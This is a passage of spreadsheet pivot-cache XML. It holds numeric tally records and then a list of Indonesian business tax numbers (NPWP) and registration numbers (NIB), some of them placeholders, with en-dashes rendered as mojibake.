    <x v="1589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="13"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="209"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="92"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1593"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="21"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="12"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="56"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="21"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="21"/>
    <x v="1543"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="1543"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="1543"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1543"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="68"/>
    <x v="1543"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="103"/>
    <x v="1543"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="16"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1596"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="15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56">
  <r>
    <x v="0"/>
    <s v="npwp"/>
    <s v="76.403.310.6‚Äì402.000"/>
  </r>
  <r>
    <x v="1"/>
    <s v="npwp"/>
    <s v="01‚Äì001‚Äì887‚Äì7‚Äì451‚Äì001"/>
  </r>
  <r>
    <x v="2"/>
    <s v="npwp"/>
    <s v="21.010.764.5‚Äì041.000"/>
  </r>
  <r>
    <x v="3"/>
    <s v="npwp"/>
    <s v="12.345.678.9‚Äì012.345"/>
  </r>
  <r>
    <x v="4"/>
    <s v="npwp"/>
    <s v="01.061.915.3‚Äì052.000"/>
  </r>
  <r>
    <x v="5"/>
    <s v="npwp"/>
    <s v="21.035.021.1‚Äì034.000"/>
  </r>
  <r>
    <x v="6"/>
    <s v="npwp"/>
    <s v="31.292.899.7‚Äì028.000"/>
  </r>
  <r>
    <x v="7"/>
    <s v="npwp"/>
    <s v="01.833.008.4‚Äì941.001"/>
  </r>
  <r>
    <x v="8"/>
    <s v="npwp"/>
    <s v="03‚Äì154‚Äì479‚Äì4‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="9"/>
    <s v="npwp"/>
    <s v="31‚Äì703‚Äì139‚Äì1‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="9"/>
    <s v="nib"/>
    <n v="8120115082332"/>
  </r>
  <r>
    <x v="10"/>
    <s v="npwp"/>
    <s v="02.285.960.7‚Äì941.000"/>
  </r>
  <r>
    <x v="11"/>
    <s v="npwp"/>
    <s v="01.360.591.0‚Äì007.000"/>
  </r>
  <r>
    <x v="12"/>
    <s v="npwp"/>
    <s v="01.061.076.4‚Äì093.000"/>
  </r>
  <r>
    <x v="13"/>
    <s v="npwp"/>
    <s v="02‚Äì648‚Äì648‚Äì0‚Äì415‚Äì000"/>
  </r>
  <r>
    <x v="14"/>
    <s v="npwp"/>
    <s v="72.717.496.3‚Äì732.000"/>
  </r>
  <r>
    <x v="14"/>
    <s v="nib"/>
    <n v="9120306970097"/>
  </r>
  <r>
    <x v="15"/>
    <s v="npwp"/>
    <s v="02.941.538.7‚Äì731.000"/>
  </r>
  <r>
    <x v="16"/>
    <s v="npwp"/>
    <s v="01.001.887.7‚Äì046.000"/>
  </r>
  <r>
    <x v="16"/>
    <s v="nib"/>
    <n v="8120003852614"/>
  </r>
  <r>
    <x v="17"/>
    <s v="npwp"/>
    <s v="14.246.045.0‚Äì732.000"/>
  </r>
  <r>
    <x v="17"/>
    <s v="nib"/>
    <n v="9120005531374"/>
  </r>
  <r>
    <x v="18"/>
    <s v="npwp"/>
    <s v="01.001.691.3‚Äì057.000"/>
  </r>
  <r>
    <x v="18"/>
    <s v="nib"/>
    <n v="8120319081767"/>
  </r>
  <r>
    <x v="19"/>
    <s v="npwp"/>
    <s v="01.534.446.8‚Äì732.000"/>
  </r>
  <r>
    <x v="20"/>
    <s v="npwp"/>
    <s v="76.519.042.6‚Äì731.000"/>
  </r>
  <r>
    <x v="20"/>
    <s v="nib"/>
    <n v="8120119291599"/>
  </r>
  <r>
    <x v="21"/>
    <s v="npwp"/>
    <s v="02‚Äì776‚Äì585‚Äì8‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="21"/>
    <s v="nib"/>
    <n v="8120118001752"/>
  </r>
  <r>
    <x v="22"/>
    <s v="npwp"/>
    <s v="21.092.762.0‚Äì047.000"/>
  </r>
  <r>
    <x v="23"/>
    <s v="npwp"/>
    <s v="03.183.128.2‚Äì041.000"/>
  </r>
  <r>
    <x v="24"/>
    <s v="npwp"/>
    <s v="76.533.959.3‚Äì041.000"/>
  </r>
  <r>
    <x v="25"/>
    <s v="npwp"/>
    <s v="02.746.158.1‚Äì402.000"/>
  </r>
  <r>
    <x v="25"/>
    <s v="nib"/>
    <n v="9120302152812"/>
  </r>
  <r>
    <x v="26"/>
    <s v="npwp"/>
    <s v="14.163.100.2‚Äì903.000"/>
  </r>
  <r>
    <x v="27"/>
    <s v="npwp"/>
    <s v="01.071.099.4‚Äì058.000"/>
  </r>
  <r>
    <x v="27"/>
    <s v="nib"/>
    <n v="8120101900065"/>
  </r>
  <r>
    <x v="28"/>
    <s v="npwp"/>
    <s v="02.612.092.3‚Äì903.000"/>
  </r>
  <r>
    <x v="29"/>
    <s v="npwp"/>
    <s v="02.797.983.0‚Äì903.000"/>
  </r>
  <r>
    <x v="30"/>
    <s v="npwp"/>
    <s v="01.960.089.9‚Äì908.000"/>
  </r>
  <r>
    <x v="31"/>
    <s v="npwp"/>
    <s v="06.775.496.0‚Äì903.000"/>
  </r>
  <r>
    <x v="31"/>
    <s v="nib"/>
    <n v="8120102821507"/>
  </r>
  <r>
    <x v="32"/>
    <s v="npwp"/>
    <s v="31.818.178.1‚Äì034.000"/>
  </r>
  <r>
    <x v="32"/>
    <s v="nib"/>
    <n v="8120015222426"/>
  </r>
  <r>
    <x v="33"/>
    <s v="npwp"/>
    <s v="01.871.171.3‚Äì046.000"/>
  </r>
  <r>
    <x v="34"/>
    <s v="npwp"/>
    <s v="01.960.054.3‚Äì908.000"/>
  </r>
  <r>
    <x v="34"/>
    <s v="nib"/>
    <n v="8120002912691"/>
  </r>
  <r>
    <x v="35"/>
    <s v="npwp"/>
    <s v="11.122.234.5‚Äì778.909"/>
  </r>
  <r>
    <x v="36"/>
    <s v="npwp"/>
    <s v="31.691.170.0‚Äì409.000"/>
  </r>
  <r>
    <x v="37"/>
    <s v="npwp"/>
    <s v="11.111.111.1‚Äì111.111"/>
  </r>
  <r>
    <x v="38"/>
    <s v="npwp"/>
    <s v="01.873.051.5‚Äì901.000"/>
  </r>
  <r>
    <x v="39"/>
    <s v="npwp"/>
    <s v="01.777.129.6‚Äì904.000"/>
  </r>
  <r>
    <x v="40"/>
    <s v="npwp"/>
    <s v="01.440.822.3‚Äì904.000"/>
  </r>
  <r>
    <x v="41"/>
    <s v="npwp"/>
    <s v="03.040.183.0‚Äì041.000"/>
  </r>
  <r>
    <x v="41"/>
    <s v="nib"/>
    <n v="8120105743719"/>
  </r>
  <r>
    <x v="42"/>
    <s v="npwp"/>
    <s v="01.984.622.9‚Äì041.000"/>
  </r>
  <r>
    <x v="43"/>
    <s v="npwp"/>
    <s v="01.984.622.9‚Äì041.000"/>
  </r>
  <r>
    <x v="44"/>
    <s v="npwp"/>
    <s v="01.360.591.0‚Äì007.000"/>
  </r>
  <r>
    <x v="45"/>
    <s v="npwp"/>
    <s v="31.428.789.7‚Äì041.000"/>
  </r>
  <r>
    <x v="46"/>
    <s v="npwp"/>
    <s v="70.068.809.6‚Äì047.000"/>
  </r>
  <r>
    <x v="47"/>
    <s v="npwp"/>
    <s v="02‚Äì984‚Äì770‚Äì4‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="47"/>
    <s v="nib"/>
    <n v="8120117271615"/>
  </r>
  <r>
    <x v="48"/>
    <s v="npwp"/>
    <s v="74.637.678.9‚Äì041.000"/>
  </r>
  <r>
    <x v="48"/>
    <s v="nib"/>
    <n v="9120204471615"/>
  </r>
  <r>
    <x v="49"/>
    <s v="npwp"/>
    <s v="21.020.861.7‚Äì008.001"/>
  </r>
  <r>
    <x v="49"/>
    <s v="nib"/>
    <n v="8120108840033"/>
  </r>
  <r>
    <x v="50"/>
    <s v="npwp"/>
    <s v="21.020.870.8‚Äì008.001"/>
  </r>
  <r>
    <x v="50"/>
    <s v="nib"/>
    <n v="8120207860013"/>
  </r>
  <r>
    <x v="51"/>
    <s v="npwp"/>
    <s v="02.296.549.5‚Äì041.000"/>
  </r>
  <r>
    <x v="51"/>
    <s v="nib"/>
    <n v="8120004870536"/>
  </r>
  <r>
    <x v="52"/>
    <s v="npwp"/>
    <s v="73.104.229.7‚Äì014.000"/>
  </r>
  <r>
    <x v="53"/>
    <s v="npwp"/>
    <s v="02.000.591.4‚Äì823.000"/>
  </r>
  <r>
    <x v="54"/>
    <s v="npwp"/>
    <s v="03.100.277.7‚Äì034.000"/>
  </r>
  <r>
    <x v="54"/>
    <s v="nib"/>
    <n v="8120006981624"/>
  </r>
  <r>
    <x v="55"/>
    <s v="npwp"/>
    <s v="03‚Äì148‚Äì675‚Äì6‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="55"/>
    <s v="nib"/>
    <n v="8120202820081"/>
  </r>
  <r>
    <x v="56"/>
    <s v="npwp"/>
    <s v="74.945.761.0‚Äì041.000"/>
  </r>
  <r>
    <x v="56"/>
    <s v="nib"/>
    <n v="8120301830418"/>
  </r>
  <r>
    <x v="57"/>
    <s v="npwp"/>
    <s v="88.888.888.8‚Äì888.888"/>
  </r>
  <r>
    <x v="58"/>
    <s v="npwp"/>
    <s v="88.888.888.8‚Äì888.888"/>
  </r>
  <r>
    <x v="59"/>
    <s v="npwp"/>
    <s v="88.888.888.8‚Äì888.888"/>
  </r>
  <r>
    <x v="60"/>
    <s v="npwp"/>
    <s v="74‚Äì175‚Äì865‚Äì0‚Äì306‚Äì000"/>
  </r>
  <r>
    <x v="60"/>
    <s v="nib"/>
    <n v="8120119123905"/>
  </r>
  <r>
    <x v="61"/>
    <s v="npwp"/>
    <n v="17759689005000"/>
  </r>
  <r>
    <x v="62"/>
    <s v="npwp"/>
    <s v="00.000.000.0‚Äì000.000"/>
  </r>
  <r>
    <x v="63"/>
    <s v="npwp"/>
    <n v="17759689005000"/>
  </r>
  <r>
    <x v="64"/>
    <s v="npwp"/>
    <s v="72.158.263.3‚Äì701.000"/>
  </r>
  <r>
    <x v="65"/>
    <s v="npwp"/>
    <s v="12.345.678.9‚Äì101.112"/>
  </r>
  <r>
    <x v="66"/>
    <s v="npwp"/>
    <s v="01‚Äì566‚Äì087‚Äì1‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="66"/>
    <s v="nib"/>
    <n v="8120009850712"/>
  </r>
  <r>
    <x v="67"/>
    <s v="npwp"/>
    <s v="34.354.545.4‚Äì656.667"/>
  </r>
  <r>
    <x v="68"/>
    <s v="npwp"/>
    <s v="17.038.155.2‚Äì013.001"/>
  </r>
  <r>
    <x v="68"/>
    <s v="nib"/>
    <n v="9120002433109"/>
  </r>
  <r>
    <x v="69"/>
    <s v="npwp"/>
    <s v="02‚Äì125‚Äì146‚Äì7‚Äì062‚Äì000"/>
  </r>
  <r>
    <x v="69"/>
    <s v="nib"/>
    <n v="8120002722675"/>
  </r>
  <r>
    <x v="70"/>
    <s v="npwp"/>
    <s v="01.996.232.3‚Äì041.000"/>
  </r>
  <r>
    <x v="71"/>
    <s v="npwp"/>
    <s v="01.744.272.4‚Äì046.000"/>
  </r>
  <r>
    <x v="72"/>
    <s v="npwp"/>
    <s v="02.968.292.9‚Äì034.000"/>
  </r>
  <r>
    <x v="73"/>
    <s v="npwp"/>
    <s v="02.052.697.6‚Äì413.000"/>
  </r>
  <r>
    <x v="74"/>
    <s v="npwp"/>
    <s v="01.368.275.2‚Äì092.000"/>
  </r>
  <r>
    <x v="75"/>
    <s v="npwp"/>
    <s v="02.076.488.2‚Äì057.000"/>
  </r>
  <r>
    <x v="76"/>
    <s v="npwp"/>
    <s v="02.076.801.6‚Äì046.000"/>
  </r>
  <r>
    <x v="77"/>
    <s v="npwp"/>
    <s v="02.394.603.1‚Äì822.000"/>
  </r>
  <r>
    <x v="78"/>
    <s v="npwp"/>
    <s v="01‚Äì506‚Äì383‚Äì7‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="78"/>
    <s v="nib"/>
    <n v="9120009142286"/>
  </r>
  <r>
    <x v="79"/>
    <s v="npwp"/>
    <s v="70.815.245.9‚Äì047.000"/>
  </r>
  <r>
    <x v="79"/>
    <s v="nib"/>
    <n v="8120101970649"/>
  </r>
  <r>
    <x v="80"/>
    <s v="npwp"/>
    <s v="21.058.887.7‚Äì047.000"/>
  </r>
  <r>
    <x v="80"/>
    <s v="nib"/>
    <n v="8120009950544"/>
  </r>
  <r>
    <x v="81"/>
    <s v="npwp"/>
    <s v="01.413.103.1‚Äì058.000"/>
  </r>
  <r>
    <x v="81"/>
    <s v="nib"/>
    <n v="8120204982805"/>
  </r>
  <r>
    <x v="82"/>
    <s v="npwp"/>
    <s v="01.775.968.9‚Äì005.000"/>
  </r>
  <r>
    <x v="83"/>
    <s v="npwp"/>
    <s v="02.380.501.3‚Äì732.001"/>
  </r>
  <r>
    <x v="83"/>
    <s v="nib"/>
    <n v="8120000711862"/>
  </r>
  <r>
    <x v="84"/>
    <s v="npwp"/>
    <s v="71.191.856.5‚Äì047.000"/>
  </r>
  <r>
    <x v="85"/>
    <s v="npwp"/>
    <s v="02.036.274.5‚Äì511.000"/>
  </r>
  <r>
    <x v="86"/>
    <s v="npwp"/>
    <s v="02.192.829.6‚Äì503.000"/>
  </r>
  <r>
    <x v="86"/>
    <s v="nib"/>
    <n v="9120006180941"/>
  </r>
  <r>
    <x v="87"/>
    <s v="npwp"/>
    <s v="31.703.794.3‚Äì506.000"/>
  </r>
  <r>
    <x v="87"/>
    <s v="nib"/>
    <n v="9120107162355"/>
  </r>
  <r>
    <x v="88"/>
    <s v="npwp"/>
    <s v="31.270.905.8‚Äì432.000"/>
  </r>
  <r>
    <x v="89"/>
    <s v="npwp"/>
    <s v="02.380.501.3‚Äì732.001"/>
  </r>
  <r>
    <x v="90"/>
    <s v="npwp"/>
    <s v="31.818.178.1‚Äì034.000"/>
  </r>
  <r>
    <x v="91"/>
    <s v="npwp"/>
    <s v="01.837.346.4‚Äì047.000"/>
  </r>
  <r>
    <x v="91"/>
    <s v="nib"/>
    <n v="8120212221176"/>
  </r>
  <r>
    <x v="92"/>
    <s v="npwp"/>
    <s v="02.380.501.3‚Äì732.001"/>
  </r>
  <r>
    <x v="93"/>
    <s v="npwp"/>
    <s v="01.356.724.3‚Äì062.000"/>
  </r>
  <r>
    <x v="93"/>
    <s v="nib"/>
    <n v="8120002711899"/>
  </r>
  <r>
    <x v="94"/>
    <s v="npwp"/>
    <s v="31.618.761.6‚Äì047.000"/>
  </r>
  <r>
    <x v="95"/>
    <s v="npwp"/>
    <s v="76.418.821.5‚Äì704.000"/>
  </r>
  <r>
    <x v="96"/>
    <s v="npwp"/>
    <s v="76.418.821.5‚Äì704.000"/>
  </r>
  <r>
    <x v="97"/>
    <s v="npwp"/>
    <s v="70.710.562.3‚Äì941.000"/>
  </r>
  <r>
    <x v="98"/>
    <s v="npwp"/>
    <s v="07.738.204.2‚Äì941.000"/>
  </r>
  <r>
    <x v="98"/>
    <s v="nib"/>
    <n v="9120406822792"/>
  </r>
  <r>
    <x v="99"/>
    <s v="npwp"/>
    <s v="03.193.392.2‚Äì072.000"/>
  </r>
  <r>
    <x v="99"/>
    <s v="nib"/>
    <n v="9120203590631"/>
  </r>
  <r>
    <x v="100"/>
    <s v="npwp"/>
    <s v="02.571.619.2‚Äì941.000"/>
  </r>
  <r>
    <x v="100"/>
    <s v="nib"/>
    <n v="8120116081128"/>
  </r>
  <r>
    <x v="101"/>
    <s v="npwp"/>
    <s v="02‚Äì831‚Äì002‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="101"/>
    <s v="nib"/>
    <n v="8120001852996"/>
  </r>
  <r>
    <x v="102"/>
    <s v="npwp"/>
    <s v="01.300.156.5‚Äì047.000"/>
  </r>
  <r>
    <x v="103"/>
    <s v="npwp"/>
    <s v="01‚Äì696‚Äì446‚Äì2‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="103"/>
    <s v="nib"/>
    <s v="812-000-3851916"/>
  </r>
  <r>
    <x v="104"/>
    <s v="npwp"/>
    <s v="02‚Äì812‚Äì141‚Äì6‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="104"/>
    <s v="nib"/>
    <n v="8120215012028"/>
  </r>
  <r>
    <x v="105"/>
    <s v="npwp"/>
    <s v="03.274.779.2‚Äì941.000"/>
  </r>
  <r>
    <x v="106"/>
    <s v="npwp"/>
    <s v="01.510.676.8‚Äì811.001"/>
  </r>
  <r>
    <x v="106"/>
    <s v="nib"/>
    <n v="8120006930063"/>
  </r>
  <r>
    <x v="107"/>
    <s v="npwp"/>
    <s v="01.892.104.9‚Äì041.000"/>
  </r>
  <r>
    <x v="107"/>
    <s v="nib"/>
    <n v="8120006842313"/>
  </r>
  <r>
    <x v="108"/>
    <s v="npwp"/>
    <s v="31.467.219.7‚Äì041.000"/>
  </r>
  <r>
    <x v="109"/>
    <s v="npwp"/>
    <s v="02.831.116.5‚Äì041.000"/>
  </r>
  <r>
    <x v="109"/>
    <s v="nib"/>
    <n v="8120307800816"/>
  </r>
  <r>
    <x v="110"/>
    <s v="npwp"/>
    <s v="76.158.009.1‚Äì047.000"/>
  </r>
  <r>
    <x v="110"/>
    <s v="nib"/>
    <n v="8120102950466"/>
  </r>
  <r>
    <x v="111"/>
    <s v="npwp"/>
    <s v="02.747.401.4‚Äì047.000"/>
  </r>
  <r>
    <x v="111"/>
    <s v="nib"/>
    <n v="8120110032667"/>
  </r>
  <r>
    <x v="112"/>
    <s v="npwp"/>
    <s v="03.107.192.1‚Äì811.000"/>
  </r>
  <r>
    <x v="113"/>
    <s v="npwp"/>
    <s v="76‚Äì322‚Äì116‚Äì5‚Äì085‚Äì001"/>
  </r>
  <r>
    <x v="113"/>
    <s v="nib"/>
    <n v="9120207192543"/>
  </r>
  <r>
    <x v="114"/>
    <s v="npwp"/>
    <s v="01.475.015.2‚Äì904.000"/>
  </r>
  <r>
    <x v="115"/>
    <s v="npwp"/>
    <s v="01.870.966.7‚Äì033.000"/>
  </r>
  <r>
    <x v="115"/>
    <s v="nib"/>
    <n v="8120004791485"/>
  </r>
  <r>
    <x v="116"/>
    <s v="npwp"/>
    <s v="02‚Äì296‚Äì220‚Äì3‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="116"/>
    <s v="nib"/>
    <n v="8120109782177"/>
  </r>
  <r>
    <x v="117"/>
    <s v="npwp"/>
    <s v="81.208.565.2‚Äì041.000"/>
  </r>
  <r>
    <x v="118"/>
